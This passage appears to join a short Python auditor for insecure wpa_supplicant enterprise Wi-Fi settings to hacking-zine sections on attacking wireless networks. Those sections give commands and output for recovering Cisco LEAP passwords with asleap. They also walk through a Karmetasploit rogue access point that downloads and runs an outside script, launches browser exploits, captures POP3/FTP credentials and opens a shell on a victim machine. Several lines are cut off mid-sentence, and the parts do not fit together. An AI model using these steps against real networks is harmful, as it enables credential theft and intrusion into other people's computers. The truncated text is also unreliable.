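# wpa_supplicant fields that bind the server certificate to an expected name.
NAME_CHECKS = ("domain_suffix_match", "domain_match", "subject_match", "altsubject_match")

def parse_networks(conf):
    """Return one {field: value} dict per network={...} block (quotes stripped)."""
    nets = []
    for block in re.findall(r"network=\{(.*?)\}", conf, re.S):
        fields = {}
        for line in block.splitlines():
            line = line.strip()
            if "=" in line and not line.startswith("#"):
                key, value = line.split("=", 1)
                fields[key.strip()] = value.strip().strip('"')
        nets.append(fields)
    return nets

def audit(conf):
    """List enterprise (EAP) networks that would accept a spoofed RADIUS certificate."""
    findings = []
    for net in parse_networks(conf):
        if "EAP" not in net.get("key_mgmt", "") and "eap" not in net:
            continue                       # PSK/open networks present no server certificate
        ssid = net.get("ssid", "?")
        if not ("ca_cert" in net or "ca_path" in net):
            findings.append(f"{ssid}: no ca_cert/ca_path, so any certificate chain is trusted")
        if not any(k in net for k in NAME_CHECKS):
            findings.append(f"{ssid}: no server-name match, so any cert from the trusted CA passes")
    return findings
```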
################################
[0x09] - Exploiting CISCO LEAP
################################
The Cisco proprietary Lightweight Extensible Authentication Protocol (LEAP) wireless authentication process helps eliminate security concerns
by supporting centralized, user-based authentication and the ability to generate dynamic WEP keys. Cisco LEAP is one of the extensible authentication
types specified by 802.1X.
LEAP is easy to implement and contains compelling features such as:
- Mutual Authentication
- User-Based Authentication
- Dynamic WEP Keys
We found that the username sent to the RADIUS server is in plaintext (captured with Wireshark), while the password was encrypted, so it is also V
asleap is a tool designed to recover weak LEAP (Cisco's Lightweight Extensible Authentication Protocol) and PPTP passwords
- Weak LEAP and PPTP password recovery from pcap and AiroPeek files or from live capture
- Deauthentication of clients on a leap WLAN (speeding up leap password recovery) AIRJACK DRIVER REQUIRED
Download Here: http://asleap.sourceforge.net/
First, use asleap's genkeys tool to produce the necessary database (.dat) and index (.idx) files:
#./genkeys -r dict -f dict.dat -n dict.idx
dict = Our wordlist/dictionary file, with one word per line
dict.dat = Our new output pass+hash file (generated as a result of running this command)
dict.idx = Our new output index filename (generated as a result of running this command)
#./genkeys -r dictionary -f dict.dat -n dict.idx
-----------------------------------------------------------------------
genkeys 1.4 - generates lookup file for asleap. <jwright@hasborg.com>
Generating hashes for passwords (this may take some time) ...Done.
3 hashes written in 0.2 seconds: 122.67 hashes/second
Starting sort (be patient) ...Done.
Completed sort in 0 compares.
Creating index file (almost finished) ...Done.
-----------------------------------------------------------------------
The final step in recovering our weak LEAP password is to run the asleap command with our newly created .dat and .idx file
#./asleap -r data/leap.dump -f dict.dat -n dict.idx
leap.dump = Our libpcap packet capture file (NOTE: Any libpcap (e.g. tcpdump, Wireshark) or AiroPeek capture file (.apc) c
dict.dat = Our output pass+hash file (generated with genkeys, see above)
dict.idx = Our new output index filename (generated with genkeys, see above)
#./asleap -r data/leap.dump -f dict.dat -n dict.idx
-----------------------------------------------------------------------
asleap 1.4 - actively recover LEAP/PPTP passwords. <jwright@hasborg.com>
Using the passive attack method.
Captured LEAP exchange information:
username: qa_leap
challenge: 0786aea0215bc30a
response: 7f6a14f11eeb980fda11bf83a142a8744f00683ad5bc5cb6
hash bytes: 4a39
NT hash: a1fc198bdbf5833a56fb40cdd1a64a39
password: qaleap
Closing pcap ...
-----------------------------------------------------------------------
Note: the success rate depends on the dictionary size.
Now asleap 2.2, which includes the "-C" and "-R" options to specify the hex-delimited bytes for the challenge an
##########################################
[0x10] - Mass Exploit with Karmetasploit
##########################################
HD Moore released some documentation (http://trac.metasploit.com/wiki/Karmetasploit) to get karmetasploit working with the
Karmetasploit can launch fake AP and exploit the client who connects to the fake AP. Hacker can log cookie, ftp, http, cre
of the client and still also exploit the browser vulnerabilities on client machine.
This method was tested on BackTrack 3 (Final).
1. Update Aircrack-NG
$ svn co http://trac.aircrack-ng.org/svn/trunk/ aircrack-ng
$ make
# make install
2. Run the aireplay-ng injection test to see whether things are working (your Wi-Fi card must support packet injection):
bt# aireplay-ng -9 wlan0
15:10:21 Trying broadcast probe requests...
15:10:21 Injection is working!
15:10:25 Found 5 APs
15:10:25 Trying directed probe requests...
15:10:26 00:1E:58:33:83:71 - channel: 2 - 'CITEC'
15:10:35 0/30: 0%
15:10:37 00:14:06:11:42:A2 - channel: 6 - 'WORKSHOP'
15:10:42 0/30: 0%
15:10:42 00:13:19:5F:D1:D0 - channel: 11 - 'VICTIM'
15:10:48 Ping (min/avg/max): 3.325ms/126.125ms/201.281ms Power: 83.27
15:10:48 5/30: 60%
15:10:48 Injection is working!
15:56:48 00:14:06:11:42:A0 - channel: 11 - 'Mywifi'
15:56:53 0/30: 0%
Injection is now working.
3. Update Metasploit
$ svn co http://metasploit.com/svn/framework3/trunk msf3
4. Download Bash script from http://www.darkoperator.com/kmsapng.tgz
The script will do the following:
- Change the MAC address of the interface
- Set the Interface in Monitor Mode
- Start the Karma AP with Airbase-ng
- Change the MTU Size for the interface
- Set the IP
- Start the DHCPD server
- Set an iptables redirect of all traffic to itself so as to bypass cached DNS entries
- Start Metasploit.
6. After that we run our kmsapng.sh like this:
#./kmsapng.sh -i wlan0 -m km -s linksys
Changing MAC Address
Current MAC: 00:0f:c1:08:12:91 (Wave Corporation)
Faked MAC: 00:40:1b:5b:b0:0b (Printer Systems Corp.)
starting fake ap
This will take 15 seconds ..............
DHCPD started successfully
Starting Packet capture to /root/kms.cap
Starting Metasploit
=[ msf v3.2-release
+ -- --=[ 304 exploits - 124 payloads
+ -- --=[ 18 encoders - 6 nops
=[ 79 aux
resource> load db_sqlite3
[*] Successfully loaded plugin: db_sqlite3
resource> db_create /root/karma.db
[*] The specified database already exists, connecting
[*] Successfully connected to the database
[*] File: /root/karma.db
resource> use auxiliary/server/browser_autopwn
resource> setg AUTOPWN_HOST 172.16.1.207
AUTOPWN_HOST => 172.16.1.207
resource> setg AUTOPWN_PORT 55550
AUTOPWN_PORT => 55550
resource> setg AUTOPWN_URI /ads
AUTOPWN_URI => /ads
resource> set LHOST 172.16.1.207
LHOST => 172.16.1.207
resource> set LPORT 45000
LPORT => 45000
resource> set SRVPORT 55550
SRVPORT => 55550
resource> set URIPATH /ads
URIPATH => /ads
resource> run
[*] Starting exploit modules on host 172.16.1.207...
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:55550/exploit/multi/browser/mozilla_compareto
[*] Local IP: http://127.0.0.1:55550/exploit/multi/browser/mozilla_compareto
[*] Server started.
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:55550/exploit/multi/browser/mozilla_navigatorjava
[*] Local IP: http://127.0.0.1:55550/exploit/multi/browser/mozilla_navigatorjava
[*] Server started.
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:55550/exploit/multi/browser/firefox_queryinterface
[*] Local IP: http://127.0.0.1:55550/exploit/multi/browser/firefox_queryinterface
[*] Server started.
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:55550/exploit/windows/browser/apple_quicktime_rtsp
[*] Local IP: http://127.0.0.1:55550/exploit/windows/browser/apple_quicktime_rtsp
[*] Server started.
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:55550/exploit/windows/browser/novelliprint_getdriversettings
[*] Local IP: http://127.0.0.1:55550/exploit/windows/browser/novelliprint_getdriversettings
[*] Server started.
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:55550/exploit/windows/browser/ms03_020_ie_objecttype
[*] Local IP: http://127.0.0.1:55550/exploit/windows/browser/ms03_020_ie_objecttype
[*] Server started.
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:55550/exploit/windows/browser/ie_createobject
[*] Local IP: http://127.0.0.1:55550/exploit/windows/browser/ie_createobject
[*] Server started.
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:55550/exploit/windows/browser/ms06_067_keyframe
[*] Local IP: http://127.0.0.1:55550/exploit/windows/browser/ms06_067_keyframe
[*] Server started.
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:55550/exploit/windows/browser/ms06_071_xml_core
[*] Local IP: http://127.0.0.1:55550/exploit/windows/browser/ms06_071_xml_core
[*] Server started.
[*] Started reverse handler
[*] Server started.
[*] Using URL: http://0.0.0.0:55550/ads
[*] Local IP: http://127.0.0.1:55550/ads
[*] Server started.
[*] Auxiliary module running as background job
resource> use auxiliary/server/capture/pop3
resource> set SRVPORT 110
SRVPORT => 110
resource> set SSL false
SSL => false
resource> run
[*] Server started.
[*] Auxiliary module running as background job
resource> use auxiliary/server/capture/pop3
resource> set SRVPORT 995
SRVPORT => 995
resource> set SSL true
SSL => true
resource> run
[*] Server started.
[*] Auxiliary module running as background job
resource> use auxiliary/server/capture/ftp
resource> run
[*] Server started.
...
...
[*] Sending Firefox location.QueryInterface() Code Execution to 10.0.0.252:1493...
[*] Command shell session 2 opened (10.0.0.1:45001 -> 10.0.0.252:1507)
msf auxiliary(http) > sessions -i 2
[*] Starting interaction with 2...
Microsoft Windows XP [Vesion 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
D:\Mozilla Firefox> cd ..
D:\>net user
User accounts for CWH
-------------------------------------------------------------------------------
__vmware_user__ Administrator ASPNET
Guest HelpAssistant IUSR_CWH
IWAM_CWH CWH SUPPORT_388945a0
The command completed successfully.
Enjoy the pwnage!! Oops, for pentest :p